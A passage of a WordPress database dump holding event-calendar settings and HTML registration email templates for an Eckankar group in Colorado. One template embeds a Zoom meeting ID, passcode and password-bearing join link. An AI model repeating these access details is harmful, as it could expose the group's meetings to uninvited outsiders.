Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(188477,268843,'mec_event_status','EventScheduled'),(188478,268843,'mec_moved_online_link',''),(188479,268843,'mec_cancelled_reason',''),(188480,268843,'mec_display_cancellation_reason_in_single_page',''),(188481,268843,'protect_children',''),(188482,268843,'passster_activate_global_protection',NULL),(188483,268843,'passster_activate_protection',NULL),(188484,268843,'passster_protection_type','password'),(188485,268843,'boldgrid_hide_page_title','0'),(188486,268843,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(188487,268843,'boldgrid_in_page_containers','1'),(188488,268843,'_thumbnail_id','266063'),(188489,268843,'_wp_old_date','2022-04-30'),(188490,268843,'passster_area_shortcode',''),(188502,268843,'_dp_original','268411'),(188492,268843,'mec_cost_auto_calculate','0'),(188493,268843,'mec_style_per_event','global'),(188494,268843,'mec_trailer_url',''),(188495,268843,'mec_trailer_title',''),(188496,268843,'mec_start_datetime','2023-08-13 10:30 AM'),(188497,268843,'mec_end_datetime','2023-08-13 11:30 AM'),(188498,268843,'mec_sequence','15'),(188499,268843,'mec_event_gallery','a:0:{}'),(188500,268843,'mec_related_events','a:0:{}'),(188501,268843,'mec_banner','a:0:{}'),(188503,268843,'_edit_lock','1693507420:2'),(188504,268843,'_edit_last','2'),(188505,268844,'mec_color',''),(188506,268844,'mec_location_id','185'),(188507,268844,'mec_dont_show_map','0'),(188508,268844,'mec_organizer_id','1'),(188509,268844,'mec_read_more',''),(188510,268844,'mec_more_info',''),(188511,268844,'mec_more_info_title',''),(188512,268844,'mec_more_info_target','_self'),(188513,268844,'mec_cost',''),(188514,268844,'mec_currency','a:0:{}'),(188515,268844,'mec_additional_organizer_ids','a:0:{}'),(188516,268844,'mec_additional_location_ids','a:0:{}'),(188517,268844,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-27\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-27\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(188518,268844,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(188519,268844,'mec_certain_weekdays','a:0:{}'),(188520,268844,'mec_allday','0'),(188521,268844,'one_occurrence','0'),(188522,268844,'mec_hide_time','0'),(188523,268844,'mec_hide_end_time','0'),(188524,268844,'mec_comment',''),(188525,268844,'mec_timezone','global'),(188526,268844,'mec_countdown_method','global'),(188527,268844,'mec_public','1'),(188528,268844,'mec_start_date','2023-08-27'),(188529,268844,'mec_start_time_hour','10'),(188530,268844,'mec_start_time_minutes','30'),(188531,268844,'mec_start_time_ampm','AM'),(188532,268844,'mec_start_day_seconds','37800'),(188533,268844,'mec_end_date','2023-08-27'),(188534,268844,'mec_end_time_hour','11'),(188535,268844,'mec_end_time_minutes','30'),(188536,268844,'mec_end_time_ampm','AM'),(188537,268844,'mec_end_day_seconds','41400'),(188538,268844,'mec_repeat_status','0'),(188539,268844,'mec_repeat_type',''),(188540,268844,'mec_repeat_interval','1'),(188541,268844,'mec_repeat_end',''),(188542,268844,'mec_repeat_end_at_occurrences',''),(188543,268844,'mec_repeat_end_at_date',''),(188544,268844,'mec_advanced_days','a:0:{}'),(188545,268844,'mec_in_days',''),(188546,268844,'mec_not_in_days',''),(188547,268844,'mec_hourly_schedules','a:0:{}'),(188548,268844,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(188549,268844,'mec_tickets','a:0:{}'),(188550,268844,'mec_fees_global_inheritance','1'),(188551,268844,'mec_fees','a:0:{}'),(188552,268844,'mec_ticket_variations_global_inheritance','1'),(188553,268844,'mec_ticket_variations','a:0:{}'),(188554,268844,'mec_reg_fields_global_inheritance','1'),(188555,268844,'mec_reg_fields','a:0:{}'),(188556,268844,'mec_bfixed_fields','a:0:{}'),(188557,268844,'mec_op','a:0:{}'),(188558,268844,'mec_fields','a:0:{}'),(188559,268844,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(188560,268844,'mec_event_status','EventScheduled'),(188561,268844,'mec_moved_online_link',''),(188562,268844,'mec_cancelled_reason',''),(188563,268844,'mec_display_cancellation_reason_in_single_page',''),(188564,268844,'protect_children',''),(188565,268844,'passster_activate_global_protection',NULL),(188566,268844,'passster_activate_protection',NULL),(188567,268844,'passster_protection_type','password'),(188568,268844,'boldgrid_hide_page_title','0'),(188569,268844,'_thumbnail_id','268845'),(188583,268844,'_dp_original','266311'),(188571,268844,'boldgrid_in_page_containers','1'),(188572,268844,'passster_area_shortcode',''),(188573,268844,'mec_cost_auto_calculate','0'),(188574,268844,'mec_style_per_event','global'),(188575,268844,'mec_trailer_url',''),(188576,268844,'mec_trailer_title',''),(188577,268844,'mec_start_datetime','2023-08-27 10:30 AM'),(188578,268844,'mec_end_datetime','2023-08-27 11:30 AM'),(188579,268844,'mec_sequence','6'),(188580,268844,'mec_event_gallery','a:0:{}'),(188581,268844,'mec_related_events','a:0:{}'),(188582,268844,'mec_banner','a:0:{}'),(188584,268844,'_edit_lock','1690650344:2'),(188585,268844,'_edit_last','2'),(188586,268845,'_wp_attached_file','2023/07/rocks-balance-1.jpg'),(188587,268845,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:806;s:6:\"height\";i:446;s:4:\"file\";s:27:\"2023/07/rocks-balance-1.jpg\";s:8:\"filesize\";i:68318;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"rocks-balance-1-350x194.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13474;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"rocks-balance-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5797;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"rocks-balance-1-768x425.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51431;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:27:\"rocks-balance-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19602;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:27:\"rocks-balance-1-500x446.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:446;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47673;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:27:\"rocks-balance-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28881;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:27:\"rocks-balance-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19901;}s:8:\"tileview\";a:5:{s:4:\"file\";s:27:\"rocks-balance-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25553;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(188588,268845,'original-file','2023/07/rocks-balance-1-updraft-pre-smush-original.jpg'),(188589,268845,'smush-complete','1'),(188590,268845,'smush-info','The file was compressed from 66.72 KB to 64.86 KB saving 2.78 percent using WP-Optimize'),(188591,268845,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:68318;s:12:\"smushed-size\";i:66421;s:15:\"savings-percent\";d:2.779999999999999804600747665972448885440826416015625;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:68318;s:10:\"compressed\";i:66421;}s:6:\"medium\";a:2:{s:8:\"original\";i:13474;s:10:\"compressed\";i:13474;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5797;s:10:\"compressed\";i:5731;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:51431;s:10:\"compressed\";i:51431;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:19602;s:10:\"compressed\";i:19571;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:47673;s:10:\"compressed\";i:47139;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:28881;s:10:\"compressed\";i:28811;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:19901;s:10:\"compressed\";i:19901;}s:8:\"tileview\";a:2:{s:8:\"original\";i:25553;s:10:\"compressed\";i:25481;}}}'),(188592,268846,'mec_color',''),(188593,268846,'mec_location_id','185'),(188594,268846,'mec_dont_show_map','0'),(188595,268846,'mec_organizer_id','1'),(188596,268846,'mec_read_more',''),(188597,268846,'mec_more_info',''),(188598,268846,'mec_more_info_title',''),(188599,268846,'mec_more_info_target','_self'),(188600,268846,'mec_cost',''),(188601,268846,'mec_currency','a:0:{}'),(188602,268846,'mec_additional_organizer_ids','a:0:{}'),(188603,268846,'mec_additional_location_ids','a:0:{}'),(188604,268846,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-20\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-20\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(188605,268846,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(188606,268846,'mec_certain_weekdays','a:0:{}'),(188607,268846,'mec_allday','0'),(188608,268846,'one_occurrence','0'),(188609,268846,'mec_hide_time','0'),(188610,268846,'mec_hide_end_time','0'),(188611,268846,'mec_comment',''),(188612,268846,'mec_timezone','global'),(188613,268846,'mec_countdown_method','global'),(188614,268846,'mec_public','1'),(188615,268846,'mec_start_date','2023-08-20'),(188616,268846,'mec_start_time_hour','10'),(188617,268846,'mec_start_time_minutes','30'),(188618,268846,'mec_start_time_ampm','AM'),(188619,268846,'mec_start_day_seconds','37800'),(188620,268846,'mec_end_date','2023-08-20'),(188621,268846,'mec_end_time_hour','11'),(188622,268846,'mec_end_time_minutes','30'),(188623,268846,'mec_end_time_ampm','AM'),(188624,268846,'mec_end_day_seconds','41400'),(188625,268846,'mec_repeat_status','0'),(188626,268846,'mec_repeat_type',''),(188627,268846,'mec_repeat_interval','1'),(188628,268846,'mec_repeat_end',''),(188629,268846,'mec_repeat_end_at_occurrences',''),(188630,268846,'mec_repeat_end_at_date',''),(188631,268846,'mec_advanced_days','a:0:{}'),(188632,268846,'mec_in_days',''),(188633,268846,'mec_not_in_days',''),(188634,268846,'mec_hourly_schedules','a:0:{}'),(188635,268846,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(188636,268846,'mec_tickets','a:0:{}'),(188637,268846,'mec_fees_global_inheritance','1'),(188638,268846,'mec_fees','a:0:{}'),(188639,268846,'mec_ticket_variations_global_inheritance','1'),(188640,268846,'mec_ticket_variations','a:0:{}'),(188641,268846,'mec_reg_fields_global_inheritance','1'),(188642,268846,'mec_reg_fields','a:0:{}'),(188643,268846,'mec_bfixed_fields','a:0:{}'),(188644,268846,'mec_op','a:0:{}'),(188645,268846,'mec_fields','a:0:{}'),(188646,268846,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6107:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone wp-image-266520 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/03/email-img-registration-597-bluframe-whitetext-9.png\" alt=\"\" width=\"604\" height=\"145\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #1d5791; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b><span style=\"color: #1d5791;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Time: 